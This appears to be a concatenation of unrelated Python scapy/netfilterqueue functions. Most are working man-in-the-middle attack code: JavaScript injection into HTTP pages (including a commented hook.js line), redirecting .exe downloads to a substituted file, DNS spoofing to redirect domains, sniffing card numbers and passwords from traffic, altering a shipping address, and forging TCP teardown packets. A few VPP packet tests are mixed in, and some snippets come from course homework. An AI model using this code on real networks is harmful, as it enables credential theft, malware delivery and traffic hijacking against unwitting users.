def print_and_accept(pkt): global secrets #print(pkt) #print(pkt.get_payload()) ip = IP(pkt.get_payload()) cc = "[0-9A-Za-z]* (cc --- ([0-9]{4}[./][0-9]{4}[./][0-9]{4}[/.][0-9]{4})) [0-9A-Za-z]" pwd = "[0-9A-Za-z] (pwd --- ([A-Z0-9:;<=>?@]*)) [0-9A-Za-z]" print(secrets) if len(secrets) == 5: print("done, sending request") data = { "student_email": "*****@*****.**", "secrets": list(secrets), } print(data) r = requests.post("http://com402.epfl.ch/hw1/ex4/sensitive", json=data) print(r.text) sys.exit() else: if (ip.haslayer(Raw)): if (ip.haslayer(TCP) and ip[TCP].dport == 80): http = ip[TCP].load.decode() print("Http received") if http.find("com402.epfl.ch/hw1/ex4/transaction"): print("Transaction http received") m = re.search(cc, http) if m: print("Found CC", m.group(2)) secrets.add(m.group(2)) m = re.search(pwd, http) if m: print("Found PASSWORD", m.group(2)) secrets.add(m.group(2)) pkt.accept()
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP): load = scapy_packet[Raw].load if scapy_packet[TCP].dport == 80: print("[+] HTTP Request") load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load) # print(scapy_packet.show()) elif scapy_packet[TCP].sport == 80: print("[+] HTTP Response") load = load.replace(b"</body>", payload + b"</body") content_length_search = re.search(b"(Content-Length:\s)(\d*)", load) if content_length_search and b"text/html" in load: content_length = content_length_search.group(2) update_content_length = int( content_length.decode()) + len(payload) print( f'Before: {content_length} ; After: {update_content_length}' ) load = load.replace(content_length, str(update_content_length).encode()) # print(scapy_packet.show()) if load != scapy_packet[Raw].load: mod_packet = set_load(scapy_packet, load) packet.set_payload(bytes(mod_packet)) packet.accept()
def process_packet(pkt): scapy_pkt = IP(pkt.get_payload()) if (scapy_pkt.haslayer(TCP) and scapy_pkt.haslayer(Raw)): tcp = scapy_pkt.getlayer(TCP) raw_load = scapy_pkt.getlayer(Raw).load # If destination port is port 80, most likely a HTTP request, else HTTP response if (tcp.dport == 80 and raw_load): #print("[+] Request") # Strip reqeuest of any encoding (such as compression) raw_load = re.sub(b"Accept-Encoding:.*?\\r\\n", b'', raw_load) # Change the request from HTTP/1.1 to HTTP/1.0 so content gets sent all at once raw_load = raw_load.replace(b"HTTP/1.1", b"HTTP/1.0") elif (tcp.sport == 80 and raw_load): content_length = re.search(b"(?:Content-Length:\s)(\d*)", raw_load) raw_load = raw_load.replace(b"</body>", INJECTION + b"</body>") # Recalculate the content length of the HTML page if (content_length and b"text/html" in raw_load): #print("[+] Attempting to inject code into response payload") content_length = content_length.group(1) new_content_length = str(int(content_length) + len(INJECTION)).encode() raw_load = raw_load.replace(content_length, new_content_length) if (raw_load != scapy_pkt.getlayer(Raw).load): scapy_pkt = set_load(scapy_pkt, raw_load) scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt))) pkt.set_payload(scapy_pkt) pkt.accept()
def process_packet(self, packet): scapy_packet = IP(packet.get_payload()) # print(scapy_packet.show()) download_path = '' if scapy_packet.haslayer(TCP): if scapy_packet.haslayer( http.HTTPRequest) and scapy_packet[TCP].dport == int( self.port): download_path = str(scapy_packet[http.HTTPRequest].Path) if ".exe" in download_path and self.file_name not in download_path: print("[+] EXE Request") self.ack_list.append(scapy_packet[TCP].ack) elif scapy_packet.haslayer( http.HTTPResponse) and scapy_packet[TCP].sport == int( self.port): if scapy_packet[TCP].seq in self.ack_list: self.ack_list.remove(scapy_packet[TCP].seq) print("[+] Replacing File") print(self.url) scapy_packet[http.HTTPResponse].Status_Code = '301' scapy_packet[ http.HTTPResponse].Reason_Phrase = 'Moved Permanently' scapy_packet[http.HTTPResponse].Location = self.url modified_packet = self.set_load(scapy_packet) print(modified_packet.show()) packet.set_payload(bytes(modified_packet)) print(IP(packet.get_payload()).show()) self.send(text_data=dumps({ 'replace_downloads_result': "[+] File has been successfully replaced" })) packet.accept()
def process_packet(self, packet): """ Determines how to process each packet in queue. Separates HTTP requests/responses and detects file downloads. Determines corresponding file req/res objects, enabling packet interception and supplantation of the res load (file). """ ack_list = [] redirect_header = f"HTTP/1.1 301 Moved Permanently\nLocation: {self.redirect_url}\n\n" # wrap payload packet in Scapy IP layer scapy_packet_obj = IP(packet.get_payload()) if (scapy_packet_obj.haslayer(scapy.Raw) and scapy_packet_obj.haslayer(TCP)): load = scapy_packet_obj[scapy.Raw].load.decode() # request obj if (scapy_packet_obj[TCP].dport == 10000): # ensure our url is not in load to prevent infinite loop if (self.target_extension in load and self.redirect_url not in load): print("[+] File Request") ack_list.append(scapy_packet_obj[TCP].ack) # response obj elif (scapy_packet_obj[TCP].sport == 10000): if (scapy_packet_obj[TCP].seq in ack_list): ack_list.remove(scapy_packet_obj[TCP].seq) print("[+] Supplanting file(s)...") generated_packet = self.generate_load( scapy_packet_obj, redirect_header.encode() ) # TEST might need to be bytes # distill into original packet obj packet.set_payload(bytes(generated_packet)) packet.accept()
def process_packet(packet): ''' Process each packet on Network filter queue ''' global PORT #Evaluate IP packet filtered IP_pkt = IP(packet.get_payload()) #If the IP packet has TCP layer and Raw Layer (it can be HTTP packet) if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP): try: #Decode load of TCP packet load = IP_pkt[Raw].load.decode() #IP packet from the victim to the server #destination port = 80 (port of HTTP server) if IP_pkt[TCP].dport == PORT: cprint('Request', 'red', attrs=[ 'bold', ]) '''Search for Accept-Encoding Header (?\\r\\n = stop at first occurrence of \\r\\n) Remove Accept-Encoding header from request(we don't understand any encoding) Remove also Chunked-Encoding by using HTTP/1.0 ''' load = re.sub('Accept-Encoding:.*?\\r\\n', '', load) load = load.replace('HTTP/1.1', 'HTTP/1.0') IP_pkt[Raw].load = load #Scapy recomputes them del IP_pkt[IP].len del IP_pkt[IP].chksum del IP_pkt[TCP].chksum packet.set_payload(bytes(IP_pkt)) #IP packet from the server to the victim #source port = 80 (port of HTTP server) elif IP_pkt[TCP].sport == PORT: cprint('Response', 'blue', attrs=[ 'bold', ]) load = injection_code(load) IP_pkt[Raw].load = load #Scapy recomputes them del IP_pkt[IP].len del IP_pkt[IP].chksum del IP_pkt[TCP].chksum packet.set_payload(bytes(IP_pkt)) except UnicodeDecodeError: #If python convertion (decode) fails for some bytes #(No HTML code, so I don't want to analyse this packet) pass packet.accept()
def process_packet(packet): ''' Process each packet on Network filter queue ''' global ack_list, TARGET, URL, PORT #Convertion of filtered packet to scapy IP packet IP_pkt = IP(packet.get_payload()) #Check if the packet has Raw and TCP layer if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP): #Request from client to server if IP_pkt[TCP].dport == PORT: cprint('Request', 'red', attrs=[ 'bold', ], end='') #Request of downloading a file with extension TARGET if TARGET in str(IP_pkt[Raw].load): cprint(': ', 'red', attrs=[ 'bold', ], end='') cprint(f'{TARGET} ', 'cyan', attrs=[ 'bold', ], end='') print('file with GET method ---> ', end='') cprint(f'{URL} ', 'yellow', attrs=[ 'bold', ]) #Append requested ACK ack_list.append(IP_pkt[TCP].ack) else: print('') #Response from server to client elif IP_pkt[TCP].sport == PORT: cprint('Response', 'blue', attrs=[ 'bold', ]) #Response sequence number is in requested ACK list if IP_pkt[TCP].seq in ack_list: #Remove corresponding ACK in the list ack_list.remove(IP_pkt[TCP].seq) IP_pkt[ Raw].load = f'HTTP/1.1 301 Moved Permanently\r\nLocation: {URL}\r\n\r\n' #Scapy recomputes them del IP_pkt[IP].len del IP_pkt[IP].chksum del IP_pkt[TCP].chksum packet.set_payload(bytes(IP_pkt)) packet.accept()
def process_packet(packet): ''' Process each packet ''' #Evaluate IP packet filtered IP_pkt = IP(packet.get_payload()) #If the IP packet has TCP layer and Raw layer (it can be HTTP packet) if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP): try: #Decode load of TCP packet load = IP_pkt[Raw].load.decode() #HTTP requests from the victim to the client if IP_pkt[TCP].dport == 80: cprint('Request', 'red', attrs=[ 'bold', ]) '''Search for Accept-Encoding Header (?\\r\\n = stop at first occurrence of \\r\\n) Remove Accept-Encoding header from request(we don't understand any encoding) ''' load = re.sub('Accept-Encoding:.*?\\r\\n', '', load) IP_pkt[Raw].load = load #Scapy recomputes them del IP_pkt[IP].len del IP_pkt[IP].chksum del IP_pkt[TCP].chksum packet.set_payload(bytes(IP_pkt)) #HTTP responses from the server to the victim elif IP_pkt[TCP].sport == 80: cprint('Response', 'blue', attrs=[ 'bold', ]) load = injection_code(load) IP_pkt[Raw].load = load #Scapy recomputes them del IP_pkt[IP].len del IP_pkt[IP].chksum del IP_pkt[TCP].chksum packet.set_payload(bytes(IP_pkt)) except UnicodeDecodeError: #To manage fail of python convertion of some bytes #(No HTML code, so I don't want to analyse this packet) pass packet.accept()
def test_pg_tun(self): """IP[46] Tunnel Mode PG""" # # test that we can send and receive IP encap'd packets on the # tun interfaces # N_PKTS = 31 # v4 tun to ethernet p = (IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) / UDP(sport=1234, dport=1234) / Raw("0" * 48)) rxs = self.send_and_expect(self.pg1, p * N_PKTS, self.pg0) for rx in rxs: self.assertEqual(rx[Ether].dst, self.pg0.remote_mac) self.assertEqual(rx[IP].dst, self.pg0.remote_ip4) # v6 tun to ethernet p = (IPv6(src=self.pg2.remote_ip6, dst=self.pg0.remote_ip6) / UDP(sport=1234, dport=1234) / Raw("0" * 48)) rxs = self.send_and_expect(self.pg2, p * N_PKTS, self.pg0) for rx in rxs: self.assertEqual(rx[Ether].dst, self.pg0.remote_mac) self.assertEqual(rx[IPv6].dst, self.pg0.remote_ip6) # eth to v4 tun p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) / IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) / UDP(sport=1234, dport=1234) / Raw("0" * 48)) rxs = self.send_and_expect(self.pg0, p * N_PKTS, self.pg1) for rx in rxs: rx = IP(rx) self.assertFalse(rx.haslayer(Ether)) self.assertEqual(rx[IP].dst, self.pg1.remote_ip4) # eth to v6 tun p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) / IPv6(src=self.pg0.remote_ip6, dst=self.pg2.remote_ip6) / UDP(sport=1234, dport=1234) / Raw("0" * 48)) rxs = self.send_and_expect(self.pg0, p * N_PKTS, self.pg2) for rx in rxs: rx = IPv6(rx) self.assertFalse(rx.haslayer(Ether)) self.assertEqual(rx[IPv6].dst, self.pg2.remote_ip6)
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): # dport = destination port, sport = source port if scapy_packet[TCP].dport == 80: if target_file in scapy_packet[scapy.Raw].load: # memorize the ack ack_list.append(scapy_packet[TCP].ack) print(f'[+] {target_file} file download request') elif scapy_packet[TCP].sport == 80: seq = scapy_packet[TCP].seq if seq in ack_list: ack_list.remove(seq) print('[+] Replace the file') modified_packet = set_load( scapy_packet, f'HTTP/1.1 301 Moved Permanently\nLocation: {fake_file}\n\n' ) packet.set_payload(str(modified_packet)) packet.accept()
def parse(packet): global websites global new_website payload = packet.get_payload() pkt = IP(payload) if not pkt.haslayer(DNSQR): packet.accept() else: for website in websites: if website in pkt[DNS].qd.qname: spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=new_website)) spoofed_pkt.show() packet.set_payload(str(spoofed_pkt)) packet.accept() return packet.accept()
def process_packet(self, packet): """ Determines how to process each packet in queue. Parses for those with DNS response, modifies response such that target_url resolves to the redirect_ip. """ # wrap payload packet in Scapy IP layer scapy_packet_obj = IP(packet.get_payload()) if (scapy_packet_obj.haslayer(DNSRR)): q_name = scapy_packet_obj[DNSQR].qname if (self.target_url in q_name): print("[+] Resolving to provided IP...") manufactured_res = DNSRR(rrname=q_name, rdata=self.redirect_ip) scapy_packet_obj[ DNS].an = manufactured_res # supplant DNS answer scapy_packet_obj[ DNS].ancount = 1 # consolidate DNS answers to 1 # CRITICAL: scapy will autogen correct len + checksum contingent on new data del scapy_packet_obj[IP].len del scapy_packet_obj[IP].chksum del scapy_packet_obj[UDP].len del scapy_packet_obj[UDP].chksum # distill into original packet obj packet.set_payload(str(scapy_packet_obj)) packet.accept()
def process_packet(self, packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(Raw): load = scapy_packet[Raw].load if scapy_packet[TCP].dport == 80: print(" [+] HTTP Request") load = sub(b"Accept-Encoding:.*?\\r\\n", b"", load) load = load.replace(b"HTTP/1.1", b"HTTP/1.0") elif scapy_packet[TCP].sport == 80: print(" [+] HTTP Response") # injection_code = '<script src="http://10.0.2.5:3000/hook.js"></script>' injection_code = "<script>alert('test');</script></body>" load = load.replace(b"</body>", bytes(injection_code, "utf-8")) content_length_search = search(b"(?:Content-Length:\s)(\d*)", load) if content_length_search and "text/html" in str(load): content_length = int(content_length_search.group(1)) new_content_length = content_length + len( injection_code) - len("</body>") load = load.replace( bytes(str(content_length), "utf-8"), bytes(str(new_content_length), "utf-8")) # WebsocketConsumer.send(text_data=dumps({ # 'code_injector_result': "[+] Code has been injector" # })) if load != scapy_packet[Raw].load: new_packet = self.set_load(scapy_packet, load) packet.set_payload(bytes(new_packet)) # Content-Length:\s\d* packet.accept()
def process_packet(packet): ''' Process each packet ''' global DOMAIN, TARGET IP_pkt = IP(packet.get_payload()) #It's a DNS Response (DNS Record Route) if (IP_pkt.haslayer(DNSRR)): #Name to be translated through DNS Query Record domain = IP_pkt[DNSQR].qname #DNS resolution response for DOMAIN domain if DOMAIN in str(domain): print("Spoofing target") answer = DNSRR(rrname=domain, rdata=TARGET) IP_pkt[DNS].an = answer #Only 1 DNS record (only 1 IP related to target) IP_pkt[DNS].ancount = 1 #Delete checksum, len of IP packet and UDP packet #(scapy then recalculate automatically them using inserted fields) del IP_pkt[IP].len del IP_pkt[IP].chksum del IP_pkt[UDP].len del IP_pkt[UDP].chksum #Set new payload and accept it packet.set_payload(bytes(IP_pkt)) packet.accept()
def process_packet(self, packet): scapy_packet = IP(packet.get_payload()) print(scapy_packet.show()) if scapy_packet.haslayer(TCP): if scapy_packet[TCP].dport == int( self.port) and scapy_packet.haslayer(http.HTTPRequest): scapy_packet[http.HTTPRequest].Http_Version = 'HTTP/1.0' scapy_packet[http.HTTPRequest].Accept_Encoding = None del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[TCP].chksum packet.set_payload(bytes(scapy_packet)) # Content-Length:\s\d* elif scapy_packet[TCP].sport == int( self.port) and scapy_packet.haslayer(Raw): load = scapy_packet[Raw].load print(" [+] HTTP Response") # injection_code = '<script src="http://10.0.2.5:3000/hook.js"></script>' injection_code = "<script>alert('2');</script></body>" load = load.replace(b"</body>", bytes(injection_code, "utf-8")) load = load.replace(b"</BODY>", bytes(injection_code, "utf-8")) # print(load) if scapy_packet.haslayer(http.HTTPResponse): if "text/html" in str( scapy_packet[http.HTTPResponse].Content_Type): if scapy_packet[http.HTTPResponse].Content_Length: content_length = int( scapy_packet[http.HTTPResponse].Content_Length) new_content_length = content_length + len( injection_code) scapy_packet[ http.HTTPResponse].Content_Length = bytes( str(new_content_length), "utf-8") if load != scapy_packet[Raw].load: scapy_packet[Raw].load = load del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[TCP].chksum packet.set_payload( bytes(scapy_packet)) # Content-Length:\s\d* print(IP(packet.get_payload()).show()) packet.accept()
def process_packet(pkt): global ACK_LIST scapy_pkt = IP(pkt.get_payload()) if (scapy_pkt.haslayer(TCP)): tcp = scapy_pkt.getlayer(TCP) raw_layer = scapy_pkt.getlayer(Raw).load if scapy_pkt.haslayer( Raw) else None # If destination port is port 80, most likely a HTTP request, else HTTP response if (tcp.dport == 80 and raw_layer): if (FILE_EXT in raw_layer and LOAD_KEYWORD not in raw_layer): ACK_LIST.append(tcp.ack) elif (tcp.sport == 80 and (tcp.seq in ACK_LIST) and raw_layer): ACK_LIST.remove(tcp.seq) scapy_pkt = set_load(scapy_pkt, CUSTOM_LOAD) # Use the class instance to recalculate the chksum and len fields for us # Accepts a packet in bytes format, then casted back into bytes for payload scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt))) # Update the current packets payload with the payload of our spoofed one pkt.set_payload(scapy_pkt) pkt.accept()
def preprocesing_packets(self, packet): pkt = IP(packet.get_payload()) http_payload = b"" http_header_exists = False image = b"" if pkt.haslayer(TCP) and pkt[TCP].haslayer(http.HTTP): GLOBAL_pkts.append(pkt) """ PACKET NFQEUEU TAMPER """ packet.set_payload(bytes(pkt)) packet.accept()
def processP(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(DNSRR): print("PROCESSING : ", scapy_packet.summary()) try: scapy_packet = modify(scapy_packet) except IndexError: pass print("FORWARDING! > ", scapy_packet.summary()) packet.set_payload(bytes(scapy_packet)) packet.accept()
def process_pkt(pkt): scapy_pkt = IP(pkt.get_payload()) if scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].dport == 80: if scapy_pkt.haslayer(scapy.Raw): for word in WORDSLIST: if word in scapy_pkt[scapy.Raw].load: print("[!] Downloading a " + word) ack_list.append(scapy_pkt[TCP].ack) if scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].sport == 80: if scapy_pkt.haslayer(scapy.Raw): if scapy_pkt[TCP].seq in ack_list: print("[!] DWLD resp for " + str(scapy_pkt[TCP].seq)) #change the file edited_pkt = set_load(scapy_pkt, LOAD) pkt.set_payload(str(edited_pkt)) ack_list.remove(scapy_pkt[TCP].seq) print("[+] file changed with " + LOAD) print( "-------------------------------------------------------------" ) pkt.accept()
def print_and_accept(pkt): #print(pkt) #print(pkt.get_payload()) ip = IP(pkt.get_payload()) if (ip.haslayer(Raw)): if (ip.haslayer(TCP) and ip[TCP].dport == 80): http = ip[TCP].load.decode() print("Http received") if http.find("com402.epfl.ch/hw1/ex3/shipping"): print("Shipping Http received") if http.find("{") > -1: print("Found json") print(http) http_json = "{" + "{".join(http.split("{")[1:]) http_json = json.loads(http_json) http_json['shipping_address'] = '*****@*****.**' r = requests.post('http://com402.epfl.ch/hw1/ex3/shipping', json=http_json) print(r) print(r.text) pkt.drop() sys.exit() pkt.accept()
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP): if scapy_packet[TCP].dport == 80: # print("HTTP Request") if ".exe".encode() in scapy_packet[Raw].load: print("[+] exe request detected.") ack_list.append(scapy_packet[TCP].ack) print(scapy_packet.show()) elif scapy_packet[TCP].sport == 80: # print("HTTP Response") if scapy_packet[TCP].seq in ack_list: ack_list.remove(scapy_packet[TCP].seq) print("[+] Modifying download file") mod_packet = set_load(scapy_packet, redirect) print(scapy_packet.show()) packet.set_payload(bytes(mod_packet)) # print(packet.get_payload()) packet.accept()
def process_pkt(pkt): scapy_pkt = IP(pkt.get_payload()) if scapy_pkt.haslayer(DNSRR): qname = scapy_pkt[DNSQR].qname print("[!] DNS Request Response for " + qname) if DEST in qname: print("[+] Spoofing for " + DEST + " with : " + RDEST) spoofed_pkt = spoof_dns(scapy_pkt, qname) #edit the pkt to send pkt.set_payload(str(spoofed_pkt)) print("-------------------------------------------------------------") pkt.accept()
def process_packet(self, packet): """ Determines how to process each packet in queue. Modifies HTTP Raw/Load layers req/res objects and injects JavaScript payload into HTML content, as matched against the injection regex. ... """ # wrap payload packet in Scapy IP layer scapy_packet_obj = IP(packet.get_payload()) if (scapy_packet_obj.haslayer(scapy.Raw) and scapy_packet_obj.haslayer(TCP)): load = scapy_packet_obj[scapy.Raw].load.decode() # request obj if (scapy_packet_obj[TCP].dport == 10000): print("[+] Request") # remove Encoding header to force resolution of HTML to UTF-8 load = re.sub(ENCODING_REGEX, "", load) # downgrade to 1.0 to avoid chunks proc exception load = load.replace("HTTP/1.1", "HTTP/1.0") # response obj elif (scapy_packet_obj[TCP].sport == 10000): print("[+] Response") content_len_grp = re.search(LEN_REGEX, load) load = load.replace(INJECTION_REGEX, self.payload + INJECTION_REGEX) if (content_len_grp and "text/html" in load): content_len = content_len_grp.group(1) new_content_len = int(content_len) + len(self.payload) load = load.replace(content_len, str(new_content_len)) load = load.encode() # did we tamper with it? if (load != scapy_packet_obj[scapy.Raw].load): generated_packet = self.generate_load(scapy_packet_obj, load) packet.set_payload(bytes(generated_packet)) packet.accept()
def process_pkt(pkt) : scapy_pkt = IP(pkt.get_payload()) if scapy_pkt.haslayer(scapy.Raw) : load = scapy_pkt[scapy.Raw].load if scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].dport == 80: #HTTP Request load = re.sub(SUPPORTED_ENCODING, NEW_SE, load) load = load.replace(HTTP11,HTTP10) elif scapy_pkt.haslayer(TCP) and scapy_pkt[TCP].sport == 80: #HTTP Response load = load.replace(PAGE_END_TAG, JS_HOOK+PAGE_END_TAG) content_length = re.search(CONTENT_LENGTH, load) if content_length and TXT_HTML in load: clength = content_length.group(1) new_clength = int(clength) + len(JS_HOOK) load = load.replace(clength, str(new_clength)) if (scapy_pkt[scapy.Raw].load != load) : print("[+] Adding the HOOK\n------------------------------------------") edited_pkt = set_load(scapy_pkt, load) pkt.set_payload(str(edited_pkt)) pkt.accept()
def callback(pkt): raw = pkt.get_payload() ip = IP(raw) if (ip.haslayer('Raw')): p = ip['Raw'].load if p[0] == 0x16 and p[1] == 0x03 and p[5] == 0x01 and p[10] > 0x01: pkt.drop() pkt = IP(dst=ip['IP'].dst, src='172.16.0.3') / TCP() pkt['TCP'].sport = ip['TCP'].sport pkt['TCP'].dport = ip['TCP'].dport pkt['TCP'].seq = ip['TCP'].seq pkt['TCP'].ack = ip['TCP'].ack pkt['TCP'].flags = 'FA' send(pkt) else: pkt.accept() else: pkt.accept()
def process_packet(self, packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(DNSRR): qname = scapy_packet[DNSQR].qname print(qname) print(self.target_website) if self.target_website in qname.decode('cp866'): self.send(text_data=dumps( {'dns_spoofing_result': "[+] Spoofing target"})) answer = DNSRR(rrname=qname, rdata=self.server_ip) scapy_packet[DNS].an = answer scapy_packet[DNS].ancount = 1 del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[UDP].len del scapy_packet[UDP].chksum packet.set_payload(bytes(scapy_packet)) packet.accept()
def process_packet(packet): """ This callback will be called everytime a new packet is redirected to the netfilter queue. :param packet: Incoming packet """ # Convert a netfilter packet to a scapy packet. scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer( DNSRR): # If the packet is a DNS Resource Record, modify it print("[Before]: ", scapy_packet.summary()) try: scapy_packet = modify_packet(scapy_packet) except IndexError: pass print("[After]: ", scapy_packet.summary()) # Set the packet back to a netfilter packet packet.set_payload(bytes(scapy_packet)) # Accept the packet packet.accept()
def verify_encrypted(self, p, sa, rxs): for rx in rxs: try: pkt = sa.decrypt(rx[IP]) if not pkt.haslayer(IP): pkt = IP(pkt[Raw].load) self.assert_packet_checksums_valid(pkt) self.assert_equal(pkt[IP].dst, self.pg0.remote_ip4) self.assert_equal(pkt[IP].src, self.pg0.local_ip4) self.assertTrue(pkt.haslayer(GRE)) e = pkt[GRE] self.assertEqual(e[IP].dst, "1.1.1.2") except (IndexError, AssertionError): self.logger.debug(ppp("Unexpected packet:", rx)) try: self.logger.debug(ppp("Decrypted packet:", pkt)) except: pass raise
def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(DNSRR): qname = scapy_packet[DNSQR].qname if 'bing.com' in qname: print('[+] Spoofing target DNS') response = DNSRR(rrname=qname, rdata=redirect_to) scapy_packet[DNS].an = response scapy_packet[DNS].ancount = 1 del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[UDP].len del scapy_packet[UDP].chksum packet.set_payload(str(scapy_packet)) packet.accept()
def verify_encrypted(self, p, sa, rxs): for rx in rxs: try: pkt = sa.decrypt(rx[IP]) if not pkt.haslayer(IP): pkt = IP(pkt[Raw].load) self.assert_packet_checksums_valid(pkt) self.assert_equal(pkt[IP].dst, self.pg0.remote_ip4) self.assert_equal(pkt[IP].src, self.pg0.local_ip4) self.assertTrue(pkt.haslayer(GRE)) e = pkt[Ether] self.assertEqual(e[Ether].dst, self.omac) self.assertEqual(e[IP].dst, "1.1.1.2") except (IndexError, AssertionError): self.logger.debug(ppp("Unexpected packet:", rx)) try: self.logger.debug(ppp("Decrypted packet:", pkt)) except: pass raise
def process_func(packets): scapy_packets = IP(packets.get_payload()) if scapy_packets.haslayer(DNSRR): qname = scapy_packets[DNSQR].qname a = "www.bing.com" if b"www.bing.com" in qname: print("[+] Spoofing Started") ans = DNSRR(rrname=qname, rdata="192.168.0.107") scapy_packets[DNS].an = ans scapy_packets[DNS].ancount = 1 del scapy_packets[IP].len del scapy_packets[IP].chksum del scapy_packets[UDP].len del scapy_packets[UDP].chksum packets.set_payload(bytes(scapy_packets)) print(scapy_packets.show()) print("\n-------------------------------------------------------------------") packets.accept()